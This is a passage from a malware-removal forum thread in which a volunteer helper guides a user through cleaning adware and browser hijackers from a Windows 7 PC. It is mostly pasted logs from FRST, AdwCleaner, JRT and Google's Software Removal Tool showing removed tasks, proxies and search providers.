"HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A31A79E-2917-48A2-9B70-B5FC12E49153}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A31A79E-2917-48A2-9B70-B5FC12E49153}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\avabvbxvh" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{176A12CA-0E00-48F8-996E-4F5457FB4C20}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{176A12CA-0E00-48F8-996E-4F5457FB4C20}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\EssentialUpdateMachine" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Winupdate" => key removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully.
Hosts restored successfully.
 
========= RemoveProxy: =========
 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
=========  bitsadmin /reset /allusers =========
 
 
BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.
 
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
 
0 out of 0 jobs canceled.
 
========= End of CMD: =========
 
 
=========  netsh winsock reset catalog =========
 
 
Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.
 
 
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 3.4 GB temporary data Removed.
 
 
The system needed a reboot.. 
 
==== End of Fixlog 16:35:06 ====


#6 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 08 June 2015 - 04:06 PM

here is the log from my most recent scan I hope it took care of the problems but I cannot be sure.

 

# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : [x64] HKLM\SOFTWARE\Description
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17801
 
 
-\\ Mozilla Firefox v29.0.1 (en-US)
 
 
-\\ Google Chrome v43.0.2357.81
 
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_49_ch&cd=2XzuyEtN2Y1L1QzutDtDtCzzyE0Dzz0EyE0CtCzztAyBzytAtN0D0Tzu0SzyyEyBtN1L2XzutBtFtBtCtFtCzztFtAtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StAtC0C0AyC0B0DzztG0F0E0A0EtGzzyEyB0EtG0AzyzztCtGyE0Ezyzz0CzytCyC0AtB0CyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyDzytC0FyC0A0EyCtG0F0F0EyBtGtAtA0DzytG0F0DyEyDtGyD0FyCyE0D0AyEyE0A0FyDyC2Q&cr=1600256073&ir=
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.istart123.com/web/?type=ds&ts=1407182232&from=irs&uid=ST3250823AS_5ND0MS92XXXX5ND0MS92&q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://websearch.ask.com/redirect?client=cr&src=kw&tb=ORJ&o=&locale=&apn_uid=F07291AA-9EF7-4A17-B334-AE977FE07341&apn_ptnrs=TV&apn_sauid=A04B0648-573A-4724-B0AB-11353C69D58F&apn_dtid=OSJ000YYUS&q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN10506&l=dis&prt=360&chn=S1122&geo=JP&ver=21&locale=en_JP&gct=sb&qsrc=2869
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Homepage] : 
[C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Startup_URLs] : 706B37E4F71A5D8A6C7872CE508DBCC110B81E67F8B90E1F37038BE65BD788BD"},"software_reporter":{"prompt_reason":"D68877DB3EF4BFB848CA20D38BB140C740E68C26218EE750180121EBF66A615F","prompt_seed":"A92B2D4AAB643DC70BDD026ED6AB3177640758E6214C16318F91707FB7C00FDA","prompt_version":"28042A40D8803BB919288337A19007DB0D43896ABD0FDB202B51377B5D5D5AAE"},"sync":{"remaining_rollback_tries":"CBDBA8D7EEF06C28B45A64EBE998A75F2CED89CDCF961FC0E110BF6F5C20DF43"}},"super_mac":"2A92E1716176EA7D4D00F4D5753839F720003C381268B7BE2C2444D4E614E17B"},"session":{"restore_on_startup":5,"startup_urls":["hxxp://www.youtube.com/","hxxp://www.google.com/","hxxp://www.istart123.com/?type=hp&ts=1407182232&from=irs&uid=ST3250823AS_5ND0MS92XXXX5ND0MS92
 
-\\ Chromium v
 
 
*************************


#7 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 08 June 2015 - 04:33 PM

Please don't run any tools unless requested!

We are not done yet!

Let me see the current logs and reply back with instructions!


cXfZ4wS.png


#8 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 08 June 2015 - 04:42 PM

Ok, now please download the following file => [attachment=165842:fixlist.txt] and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

Let me know how if Chrome's issues remains.

 

 

Regards,

Georgi


cXfZ4wS.png


#9 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 08 June 2015 - 06:18 PM

Newest scan results boss.
 
Fix result of Farbar Recovery Scan Tool (x64) Version:08-06-2015
Ran by dell 2 at 2015-06-08 18:06:13 Run:2
Running from C:\Users\dell 2\Downloads
Loaded Profiles: dell 2 & MSSQL$SQLEXPRESS (Available Profiles: dell 2 & MSSQL$SQLEXPRESS & Classic .NET AppPool & localhost & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
cmd: type "C:\Users\dell 2\Desktop\JRT.txt"
cmd: type "C:\Users\dell 2\Downloads\software_removal_tool.log"
cmd: type "C:\Users\dell 2\Desktop\Result.txt"
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\system32\ysxja.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\cygavb.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00053248 _____ C:\Windows\zlib.dll
2015-05-31 19:32 - 2013-12-05 07:36 - 00003542 _____ C:\Windows\mstdcvtr.bat
2015-05-31 19:32 - 2013-06-05 08:38 - 00004122 _____ C:\Windows\plofgye
2015-05-31 19:32 - 2013-06-05 08:37 - 00004194 _____ C:\Windows\soxe
2015-05-31 19:32 - 2013-06-05 08:36 - 00000038 _____ C:\Windows\initcvtr.bat
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\Drivers\healusb.sys
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\cygwin.sys
2015-05-31 19:32 - 2012-12-17 07:45 - 00018559 _____ C:\Windows\default.cfg
2015-05-31 19:32 - 2012-07-09 11:02 - 00279552 _____ (Eric Lawrence) C:\Windows\FiddlerCore4.dll
cmd: chkdsk c: |find /v "percent" >> "%userprofile%\desktop\checkhd.txt"
cmd: type "C:\Users\dell 2\Desktop\checkhd.txt"
Hosts:
RemoveProxy:
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
EmptyTemp:
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
 
=========  type "C:\Users\dell 2\Desktop\JRT.txt" =========
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.9.0 (06.07.2015:1)
OS: Windows 7 Professional x64
Ran by dell 2 on 2015/06/08 at  3:30:43.51
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Tasks
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ Chrome
 
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Preferences] - default search provider reset
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset
 
[C:\Users\dell 2\appdata\local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[]
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 2015/06/08 at  3:36:12.28
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
========= End of CMD: =========
 
 
=========  type "C:\Users\dell 2\Downloads\software_removal_tool.log" =========
 
[0606/002652:INFO:scoped_logging.cc(50)] Starting logs for version: 3.22.0
[0606/002652:INFO:crash_client.cc(273)] GoogleCrashHandler could not be reached.
[0606/002652:INFO:chrome_cleaner_main.cc(235)] Crash reporting is not available.
[0606/002652:ERROR:chrome_cleaner_main.cc(251)] Failed to save ZoneIdentifier, 80070057: The specified procedure could not be found. (0x7F)
[0606/002652:ERROR:restart_manager_wrapper.cc(87)] RmStartSession failed.: The operation completed successfully. (0x0)
[0606/002652:INFO:recovery_component.cc(208)] Sent request to download Recovery Component.
[0606/002653:INFO:chrome_util.cc(288)] Using Old version field from registry. Update in progress?
[0606/002653:INFO:chrome_profile_reset_component.cc(95)] Found Compatible Chrome version: 43.0.2357.81
[0606/002653:ERROR:task_scheduler.cc(1062)] RegisterTaskDefinition failed. 80041315: The operation completed successfully. (0x0)
[0606/002653:ERROR:pending_logs_service.cc(87)] Failed to register logs upload retry task.
[0606/002653:INFO:recovery_component.cc(172)] Recovery Component successfully downloaded.
[0606/002702:INFO:recovery_component.cc(143)] ChromeRecovery returned code: 1
[0606/002702:INFO:chrome_util.cc(288)] Using Old version field from registry. Update in progress?
[0606/002702:INFO:chrome_profile_reset_component.cc(95)] Found Compatible Chrome version: 43.0.2357.81
[0606/002702:INFO:chrome_profile_reset_component.cc(77)] Found C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
[0606/002702:INFO:system_report_component.cc(449)] Modules begin.
[0606/002702:INFO:system_report_component.cc(457)] Module: 'software_removal_tool.exe', path = 'C:\Users\dell 2\Downloads\software_removal_tool.exe', digest = '7C91545F7B1E2E0DD31A3C1D8F3E8100EDFDA02571F90481E7FAC678D43C2854', company_name = 'Google', company_short_name = 'Google', product_name = 'Software Removal Tool', product_short_name = 'Software Removal Tool', internal_name = 'software_removal_tool_exe', original_filename = 'software_removal_tool.exe', file_description = 'Software Removal Tool', file_version = '3.22.0'.
[0606/002702:INFO:system_report_component.cc(457)] Module: 'WLIDNSP.DLL', path = 'C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL', digest = '8CC99491880DBC444651EB7D245EEE46FE77F4FA74FECFCD29E734AA21AF9D75', company_name = 'Microsoft Corp.', product_name = 'Microsoft® CoReXT', internal_name = 'WlidNSP.dll', original_filename = 'WlidNSP.dll', file_description = 'Microsoft® Windows Live ID Namespace Provider', file_version = '7.250.4225.0'.
[0606/002702:INFO:system_report_component.cc(461)] Modules end.
[0606/002702:INFO:system_report_component.cc(303)] Running processes begin.
[0606/002702:INFO:system_report_component.cc(323)] Process: '[System Process]'.
[0606/002702:INFO:system_report_component.cc(323)] Process: 'System'.
[0606/002703:INFO:system_report_component.cc(323)] Process: 'software_removal_tool.exe', path = 'C:\Users\dell 2\Downloads\software_removal_tool.exe', digest = '7C91545F7B1E2E0DD31A3C1D8F3E8100EDFDA02571F90481E7FAC678D43C2854', company_name = 'Google', company_short_name = 'Google', product_name = 'Software Removal Tool', product_short_name = 'Software Removal Tool', internal_name = 'software_removal_tool_exe', original_filename = 'software_removal_tool.exe', file_description = 'Software Removal Tool', file_version = '3.22.0'.
[0606/002703:INFO:system_report_component.cc(327)] Running processes end.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Accelerometer Service', name = 'Acceler', path = 'C:\Windows\system32\DRIVERS\Accelern.sys', digest = '610E90D70FAF624664C5111030C85CF27703DED031CB7293334EB4D67D0274C9', company_name = 'ST Microelectronics', product_name = 'Accelerometer Sensor Driver', internal_name = 'accelern.sys', original_filename = 'accelern.sys', file_description = 'Accelerometer Port I/O', file_version = '1.00.00.06'.
[0606/002703:ERROR:system_report_component.cc(123)] Cannot determine absolute path: file does not exist.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Ancillary Function Driver for Winsock', name = 'AFD', path = '\SystemRoot\system32\drivers\afd.sys'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'amdxata', name = 'amdxata', path = 'C:\Windows\system32\drivers\amdxata.sys', digest = '296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F', company_name = 'Advanced Micro Devices', product_name = 'Storage Filter Driver', internal_name = 'vadd.sys', original_filename = 'vadd.sys', file_description = 'Storage Filter Driver', file_version = '1.1.2.5 (NT.091202-1659)'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Alps Touch Pad Filter Driver for Windows x64', name = 'ApfiltrService', path = 'C:\Windows\system32\DRIVERS\Apfiltr.sys', digest = '1DD3551527CF0D853F48399DBF6AAA7814EB4DEEF9A4193B2CC8D068084DB24A', company_name = 'Alps Electric Co., Ltd.', product_name = 'Alps Touch Pad Driver', internal_name = 'Apfiltr.sys', original_filename = 'Apfiltr.sys', file_description = 'Alps Touch Pad Driver', file_version = '7,4,0,94 built by: WinDDK'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0', name = 'b57nd60a', path = 'C:\Windows\system32\DRIVERS\b57nd60a.sys', digest = 'C2062C64C7737BAF92767B73C856B9A3C505758C1F0D411DCBB23D26837041D1', company_name = 'Broadcom Corporation', product_name = 'Broadcom NetXtreme Gigabit Ethernet Driver', internal_name = 'b57nd60a.sys (b57nd6x-rel_14.4-lhdepot1106.CL-134701)', original_filename = 'b57nd60a.sys', file_description = 'Broadcom NetXtreme Gigabit Ethernet NDIS6.x Unified Driver.', file_version = '14.4.2.4 (cbuild.02072011-740,b57nd6x-rel_14.4-lhdepot1106.CL-134701)'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Beep', name = 'Beep'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Juniper Network Connect Adapter', name = 'dsNcAdpt', path = 'C:\Windows\system32\DRIVERS\dsNcAdpt.sys', digest = '3583D00634C36B16880766F7635BFF48D04CECA4F2489E2720EBE33007CA0B9B', company_name = 'Juniper Networks', product_name = 'Network Connect', internal_name = 'dsNcAdapter', original_filename = 'dsNcAdpt.sys', file_description = 'dsNcAdapter', file_version = '7.2.0'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Msfs', name = 'Msfs'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'NDIS Proxy', name = 'NDProxy'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Npfs', name = 'Npfs'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Ntfs', name = 'Ntfs'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'Null', name = 'Null'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'O2MDRRDR', name = 'O2MDRRDR', path = 'C:\Windows\system32\DRIVERS\O2MDRw7x64.sys', digest = 'E91E8C27FA111CC20CCB05F41CBF181C398F48A980B523A041CACE242990F77A', company_name = 'O2Micro ', product_name = 'O2Micro Media Reader Driver', internal_name = 'O2Media', original_filename = 'O2mdr.sys', file_description = 'O2Micro Media Reader Driver (AMD64)', file_version = '2, 2, 1, 7011'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'O2SDJRDR', name = 'O2SDJRDR', path = 'C:\Windows\system32\DRIVERS\o2sdjw7x64.sys', digest = '57C7FEC288829EE7A2F043D8307908E495905C7B410A7CA5020B409C1D35E6E0', company_name = 'O2Micro ', product_name = 'O2Micro SD Reader Driver', internal_name = 'O2SDJ', original_filename = 'O2SDJ.sys', file_description = 'O2Micro SD Reader Driver (AMD64)', file_version = '2, 2, 1, 7067'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'PBADRV', name = 'PBADRV', path = 'C:\Windows\system32\DRIVERS\PBADRV.sys', digest = 'F6CB6C4B5B206E75BC8EB125363B1A095BA24FCC997A10605D59FCE44BA8651C', company_name = 'Dell Inc', product_name = 'Application Driver', internal_name = 'PBADRV.SYS', original_filename = 'PBADRV.SYS', file_description = 'PBA Support Driver', file_version = '1, 0, 1, 5'.
[0606/002703:INFO:system_report_component.cc(431)] Service: 'PxHlpa64', name = 'PxHlpa64', path = 'C:\Windows\System32\Drivers\PxHlpa64.sys', digest = '3EB8DB0624E646F0A65D0381408D35CF9FDC5ABFC30DF6431F4070A8EB68447C', company_name = 'Sonic Solutions', product_name = 'PxHelp64', internal_name = 'PxHelp64', original_filename = 'PxHelp64.sys', file_description = 'Px Engine Device Driver for 64-bit Windows', file_version = '3.00.93.0'.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'Disk Class Filter Driver for Accelerometer', name = 'stdcfltn', path = 'C:\Windows\system32\DRIVERS\stdcfltn.sys', digest = 'E97C7FFCAF2C7A83B270B6C797A91C2731FEA26874FE1E59B4CB55D5D98744BB', company_name = 'ST Microelectronics', product_name = 'Disk Class Filter Driver for Accelerometer', internal_name = 'stdcfltn.sys', original_filename = 'stdcfltn.sys', file_description = 'Disk Class Filter Driver for Accelerometer', file_version = '1.00.00.07'.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'Symantec Data Store', name = 'SymDS', path = 'C:\Windows\system32\drivers\N360x64\1507000.00B\SYMDS64.SYS', digest = '5DECD977A823C14B4D980D3DB621BC875231B741653F0450A027FC9E87725F9D', company_name = 'Symantec Corporation', product_name = 'SymDS', internal_name = 'SymDS', original_filename = 'SymDS64.sys', file_description = 'Symantec Data Store', file_version = '2.3.0.20'.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'Symantec Extended File Attributes', name = 'SymEFA', path = 'C:\Windows\system32\drivers\N360x64\1507000.00B\SYMEFA64.SYS', digest = '296D29EDF53956D1899DE4669AB429C280DF9F183F00AE1CE528E7C575802235', company_name = 'Symantec Corporation', product_name = 'EFA', internal_name = 'SymEFA', original_filename = 'SymEFA64.sys', file_description = 'Symantec Extended File Attributes', file_version = '4.3.2.6'.
[0606/002704:ERROR:system_report_component.cc(123)] Cannot determine absolute path: file does not exist.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'Microsoft USB 2.0 Enhanced Host Controller Miniport Driver', name = 'usbehci', path = '\SystemRoot\system32\drivers\usbehci.sys'.
[0606/002704:ERROR:system_report_component.cc(123)] Cannot determine absolute path: file does not exist.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'VgaSave', name = 'VgaSave', path = '\SystemRoot\System32\drivers\vga.sys'.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'VMware VMCI Bus Driver', name = 'vmci', path = 'C:\Windows\system32\DRIVERS\vmci.sys', digest = 'ED1B1B1DDEAA776E3CBFFDE4B8FC7FDD44A6DECEE8DEFC96EAFBFAB1ADF68A29', company_name = 'VMware, Inc.', product_name = 'VMware PCI VMCI Bus Device', internal_name = 'vmci.sys', original_filename = 'vmci.sys', file_description = 'VMware PCI VMCI Bus Device', file_version = '9.1.54.0'.
[0606/002704:ERROR:system_report_component.cc(123)] Cannot determine absolute path: file does not exist.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'VMware kbd', name = 'vmkbd', path = '\??\C:\Windows\system32\drivers\VMkbd.sys', digest = '4F17B24F1B8AA60DB141ABCBCEBE7F9D60CF9A7A8DB03269920062931758D96F'.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'VMware Virtual Ethernet Adapter Driver', name = 'VMnetAdapter', path = 'C:\Windows\system32\DRIVERS\vmnetadapter.sys', digest = '5FEDEC6EBA72652B89F57E275B25CC6333BE78FB2B74DEADDD588CE1089DCE89', company_name = 'VMware, Inc.', product_name = 'VMware virtual network adapter driver (64-bit)', internal_name = 'VMnetadapter.sys', original_filename = 'VMnetadapter.sys', file_description = 'VMware virtual network adapter driver (64-bit)', file_version = '4.1.2.0'.
[0606/002704:ERROR:system_report_component.cc(123)] Cannot determine absolute path: file does not exist.
[0606/002704:INFO:system_report_component.cc(431)] Service: 'Windows Socket 2.0 Non-IFS Service Provider Support Environment', name = 'ws2ifsl', path = '\SystemRoot\system32\drivers\ws2ifsl.sys'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKLM\software\microsoft\windows\currentversion\run\PWRISOVM.EXE' = 'C:\Program Files\PowerISO\PWRISOVM.EXE -startup'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\Skype' = '"C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\Battle.net' = '"C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe" --autostarted'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\Steam' = '"C:\Program Files (x86)\Steam\Steam.exe" -silent'.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\run\AdobeBridge' = ''.
[0606/002704:INFO:system_report_component.cc(231)] Registry 'HKCU\software\microsoft\windows\currentversion\runonce\Report' = 'C:\AdwCleaner\AdwCleaner[S4].txt'.
[0606/002704:INFO:system_report_component.cc(255)] Registry 'HKLM\system\currentcontrolset\control\session manager\bootexecute' = 'autocheck autochk *'.
[0606/002704:INFO:system_report_component.cc(483)] Chrome installation detected: 'C:\Program Files (x86)\google\chrome\application\43.0.2357.81'.
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Adobe
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Apple Software Update
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Battle.net
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Cisco
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Citrix
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Common Files
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Creative
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\CyberLink
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Dell
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Dell Webcam
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Digital Line Detect
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\FileZilla FTP Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\FileZilla Server
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Gemalto
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Glyph
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Google
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\HandsFree
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Hearthstone
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Heroes of the Storm
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\InstallShield Installation Information
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Intel
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Internet Explorer
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Java
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Juniper Networks
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Malwarebytes Anti-Malware
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft Analysis Services
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft Application Virtualization Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft Office
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft SDKs
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft Security Client
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft Silverlight
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft SkyDrive
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft SQL Server
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft SQL Server Compact Edition
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft Visual Studio 10.0
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Microsoft.NET
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Mozilla Firefox
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Mozilla Maintenance Service
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Mozilla Thunderbird
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\MSBuild
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\MSXML 4.0
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Netwaiting
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Norton Security Suite
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\NortonInstaller
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\Notepad++
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\NTRU Cryptosystems
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\O2Micro
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\O2Micro OZ776 SCR Driver
[0606/002705:INFO:system_report_component.cc(278)] Program: C:\Program Files (x86)\OpenOffice.org 3
